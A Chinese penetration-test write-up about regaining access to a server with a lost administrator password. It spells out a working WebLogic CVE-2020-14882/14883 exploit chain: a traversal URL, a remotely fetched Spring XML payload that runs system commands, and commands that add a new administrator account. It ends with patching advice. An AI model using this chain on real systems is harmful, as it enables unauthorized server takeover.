《中華人民共和國(guó)刑法》
第二百八十五條規(guī)定，非法侵入計(jì)算機(jī)信息系統(tǒng)罪；非法獲取計(jì)算機(jī)信息系統(tǒng)數(shù)據(jù)、非法控制計(jì)算機(jī)信息系統(tǒng)罪；提供侵入、非法控制計(jì)算機(jī)信息系統(tǒng)程序、工具罪是指，違反國(guó)家規(guī)定，侵入國(guó)家事務(wù)、國(guó)防建設(shè)、尖端科學(xué)技術(shù)領(lǐng)域的計(jì)算機(jī)信息系統(tǒng)的，處三年以下有期徒刑或者拘役。

違反國(guó)家規(guī)定，侵入前款規(guī)定以外的計(jì)算機(jī)信息系統(tǒng)或者采用其他技術(shù)手段，獲取該計(jì)算機(jī)信息系統(tǒng)中存儲(chǔ)、處理或者傳輸?shù)臄?shù)據(jù)，或者對(duì)該計(jì)算機(jī)信息系統(tǒng)實(shí)施非法控制，情節(jié)嚴(yán)重的，處三年以下有期徒刑或者拘役，并處或者單處罰金；情節(jié)特別嚴(yán)重的，處三年以上七年以下有期徒刑，并處罰金。

提供專門用于侵入、非法控制計(jì)算機(jī)信息系統(tǒng)的程序、工具，或者明知他人實(shí)施侵入、非法控制計(jì)算機(jī)信息系統(tǒng)的違法犯罪行為而為其提供程序、工具，情節(jié)嚴(yán)重的，依照前款的規(guī)定處罰。

背景說明
本次滲透已獲得授權(quán)，本文僅用于分享滲透思路，若將本文思路用于違法行為，后果自負(fù)！
本次滲透目的用于找回一臺(tái)服務(wù)器密碼，因?yàn)楣芾韱T密碼丟失，無法登錄和管理此服務(wù)器，而停機(jī)PE修改密碼必然會(huì)影響業(yè)務(wù)運(yùn)行，因此本次采用滲透方式嘗試獲取管理員密碼。

信息收集
一開始我有想過MS17-010永恒之藍(lán)漏洞和向日葵CNVD-2022-10270/CNVD-2022-03672，可以一擊必殺，但現(xiàn)實(shí)肯定沒這么簡(jiǎn)單，MS17-010的補(bǔ)丁已經(jīng)打了，而向日葵這玩意會(huì)自動(dòng)升級(jí)。

所以先用Goby全端口全漏洞掃描了一遍

能掃出來的高危漏洞就有5個(gè)，這不穩(wěn)了？
ActiveMQ default admin account
默認(rèn)管理員密碼漏洞，漏洞存在，但是這個(gè)組件我不熟悉，沒法利用

CVE-2019-0708 BlueKeep Microsoft Remote Desktop RCE
BlueKeep這漏洞在我心里就是個(gè)藍(lán)屏漏洞，在這里無用武之地

tomcat lfi (CVE-2020-1938)
文件讀取、包含，我這里管理員都登陸不上去，所以也沒啥用

Weblogic Server RCE (CVE-2021-2109)
遠(yuǎn)程代碼執(zhí)行漏洞，實(shí)現(xiàn)起來有點(diǎn)復(fù)雜，先放一下

Oracle WebLogic Unauthenticated Takeover (CVE-2020-14883)
CVE-2020-14882&CVE-2020-14883 Weblogic未授權(quán)遠(yuǎn)程命令執(zhí)行漏洞，這兩個(gè)漏洞一般是同時(shí)修復(fù)，存在一個(gè)基本也就存在另一個(gè)，兩者結(jié)合，可以一試

構(gòu)造POC
查看登錄頁(yè)

http://IP:7001/console/login/LoginForm.jsp

后臺(tái)越權(quán)訪問

http://IP:7001/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=AppDeploymentsControlPage&handle=com.bea.console.handles.JMXHandle%28%22com.bea%3AName%3Dbase_domain%2CType%3DDomain%22%29

編寫POC.XML，上傳到自己的web服務(wù)器

<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd"> ?<bean id="pb" class="java.lang.ProcessBuilder" init-method="start"> ? ?<constructor-arg> ? ? ?<list> ? ? ? ?<value>cmd</value> ? ? ? ?<value>/c</value> ? ? ? ?<value><![CDATA[echo hello > "../../../wlserver/server/lib/consoleapp/webapp/images/xxx.jsp"]]></value> ? ? ?</list> ? ?</constructor-arg> ?</bean> </beans>

執(zhí)行遠(yuǎn)端XML

http://IP:7001/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://我的web服務(wù)器/poc.xml")

驗(yàn)證結(jié)果

http://IP:7001/console/images/xxx.jsp

穩(wěn)了！查看當(dāng)前用戶，把POC里的echo hello改成whoami，驗(yàn)證結(jié)果

system權(quán)限，我焯！
依次構(gòu)造添加用戶并加入管理員組的POC

net user test test /add net localgroup administrators test /add

直接遠(yuǎn)程登陸

因?yàn)闆]有管理員密碼，所以管理員從未登陸過，使用Mimikatz獲取管理員密碼的嘗試失敗了。

我這里選擇修改administrator密碼，至此，滲透完成！

修復(fù)建議
1、及時(shí)更新系統(tǒng)補(bǔ)丁，淘汰已過期的操作系統(tǒng)，如windows2008R2
2、及時(shí)更新服務(wù)組件，如本文中OracleWebLogic、ActiveMQ、tomcat均存在漏洞
3、安裝EDR、部署IPS入侵防御系統(tǒng)，增強(qiáng)系統(tǒng)安全性